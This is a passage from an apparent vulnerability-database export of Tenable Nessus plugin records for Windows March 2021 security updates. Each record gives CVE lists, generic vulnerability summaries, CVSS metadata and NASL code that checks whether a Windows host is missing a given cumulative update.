value:\"MS21-5000803\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000803: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864,\n CVE-2021-26865, CVE-2021-26866, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26891, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000803-os-build-14393-4283-711d10dd-adcb-490b-a640-aaa25009cfed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8ea83\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000803'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000803])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:29", "description": "The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26900, CVE-2021-26901, CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26867, CVE-2021-26876, CVE-2021-26881, CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000802: Windows Security Update (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-27070", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000802.NASL", "href": "https://www.tenable.com/plugins/nessus/147226", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147226);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27070\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000802\");\n script_xref(name:\"MSFT\", value:\"MS21-5000802\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000802: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000802-os-builds-19041-867-and-19042-867-63552d64-fe44-4132-8813-ef56d3626e14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8437e591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27070\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000802'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:29", "description": "The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26900, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26867, CVE-2021-26876, CVE-2021-26881, CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000808: Windows 10 Version 1909 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000808.NASL", "href": "https://www.tenable.com/plugins/nessus/147220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147220);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000808\");\n script_xref(name:\"MSFT\", value:\"MS21-5000808\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000808: Windows 10 Version 1909 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000808-os-build-18363-1440-6989940a-252d-48f3-a2a7-a42bf19fa2c8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8c6d108\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000808.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24090\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:44", "description": "The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26876, CVE-2021-26877, CVE-2021-26881, CVE-2021-26890, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000822.NASL", "href": "https://www.tenable.com/plugins/nessus/147223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147223);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n 